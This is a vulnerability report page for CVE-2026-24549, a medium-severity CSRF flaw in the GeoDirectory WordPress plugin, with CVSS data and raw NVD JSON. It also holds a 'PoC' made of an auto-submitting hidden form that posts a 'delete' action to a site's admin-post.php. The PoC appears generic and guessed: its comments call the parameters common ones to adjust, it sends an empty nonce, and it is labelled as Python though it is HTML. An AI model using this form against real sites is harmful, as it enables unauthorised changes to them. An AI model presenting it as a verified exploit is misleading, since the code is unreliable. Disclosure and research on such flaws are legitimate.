Security Vulnerability Report
中文
CVE-2026-24549 CVSS 4.3 MEDIUM

CVE-2026-24549

Published: 2026-01-23 15:16:11
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Paolo GeoDirectory geodirectory allows Cross Site Request Forgery.This issue affects GeoDirectory: from n/a through <= 2.8.149.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GeoDirectory <= 2.8.149

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for GeoDirectory CVE-2026-24549 --> <!-- This PoC demonstrates a CSRF attack that could trigger unwanted actions --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - GeoDirectory</title> </head> <body> <h1>CSRF Proof of Concept</h1> <p>This page demonstrates the CSRF vulnerability in GeoDirectory plugin.</p> <!-- Auto-submit form that triggers the malicious request --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Common GeoDirectory admin action parameters --> <input type="hidden" name="action" value="geodirectory_admin_action"> <input type="hidden" name="subaction" value="geodir_action"> <input type="hidden" name="_wpnonce" value=""> <!-- Modify these parameters based on target functionality --> <input type="hidden" name="data[city_id]" value="1"> <input type="hidden" name="data[action_type]" value="delete"> </form> <script> // Auto-submit after page loads document.addEventListener('DOMContentLoaded', function() { console.log('CSRF PoC loaded - form will auto-submit'); // Uncomment below line to execute the attack // document.getElementById('csrfForm').submit(); }); </script> <p><strong>Note:</strong> This is for educational and security testing purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24549", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:11.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Paolo GeoDirectory geodirectory allows Cross Site Request Forgery.This issue affects GeoDirectory: from n/a through <= 2.8.149."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Paolo GeoDirectory permite la falsificación de petición en sitios cruzados. Este problema afecta a GeoDirectory: desde n/a antes de 2.8.150."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/geodirectory/vulnerability/wordpress-geodirectory-plugin-2-8-147-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}